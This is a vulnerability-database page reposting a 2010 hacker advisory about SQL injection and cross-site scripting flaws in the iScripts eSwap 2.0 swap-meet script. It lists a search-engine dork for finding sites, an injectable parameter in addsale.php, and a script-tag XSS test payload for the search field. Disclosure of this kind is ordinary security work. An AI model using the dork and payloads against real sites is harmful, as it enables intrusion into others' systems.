Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

iScripts eSwap 2.0 Cross Site Scripting / SQL Injection

🗓️ 07 Jun 2010 00:00:00Reported by Sid3 effectsType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

iScripts eSwap 2.0 allows virtual swapmeet creation with listing, selling, buying, fee charging, payment support, and admin control. Vulnerable to SQL injection and XSS attacks

Code
`# Title:iScripts eSwap v2.0 sqli and xss vulnerability  
# Author: Sid3^effects   
# Published: 2010-06-05   
# price:$99.95  
# email:[email protected]   
# vendor: iScripts  
# url : http://www.iscripts.com/eswap/  
# google dork : Powered by iScripts eSwap.   
  
############################################################################  
  
ooooo .oooooo. oooooo oooooo oooo   
  
`888' d8P' `Y8b `888. `888. .8'   
  
888 888 `888. .8888. .8'   
  
888 888 `888 .8'`888. .8'   
  
888 888 `888.8' `888.8'   
  
888 `88b ooo `888' `888'   
  
o888o `Y8bood8P' `8' `8'   
  
  
--------------------------------------------------------------------------------------   
  
#####################Sid3^effects aKa HaRi##################################   
  
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]   
  
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR   
  
#ShouTZ:kedar,dec0d3r,41.w4r10r  
  
#spl shoutz:LiquidWorm,gunslinger_ :D   
  
#Catch us at www.andhrahackers.com or www.teamicw.in   
  
############################################################################   
Description :   
  
iScripts eSwap enables you to create an virtual swapmeet site in minutes. End users can list items for swap, sell or buy. Let end users to swap unwanted items for things they want! Users can add items for sale or swap. They can also add their wish list for trading items. eSwap lets you charge users a fee for listing, featured listing and optional escrow service. Credit card payments through Authorize.net , Paypal, 2checkout and Google checkout are supported. Also offline payment methods are supported. The powerful admin section allows you to have multiple categories, sub categories and control every aspects of the business. This exchange platform is the ultimate green business by helping your users to recycle  
############################################################################   
  
Sql injection and XSS is found in the eswap script V2.0  
  
Xploit :\m/ sqli \m/  
  
  
demo url:http://www.iscripts.com/eswap/demo/addsale.php?type=[Sqli]  
  
Xploit: \m/ Xss \m/  
  
XSS is found in search field :D  
  
Attack pattern : '"--><script>alert(0x000872)</script>  
  
demo url :http://www.iscripts.com/eswap/demo/search.php  
  
############################################################################   
  
#Sid3^effects   
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jun 2010 00:00Current
0.8Low risk
Vulners AI Score0.8
iscripts eswapvirtual swapmeetsql injectionxssfee chargingpayment supportadmin control
28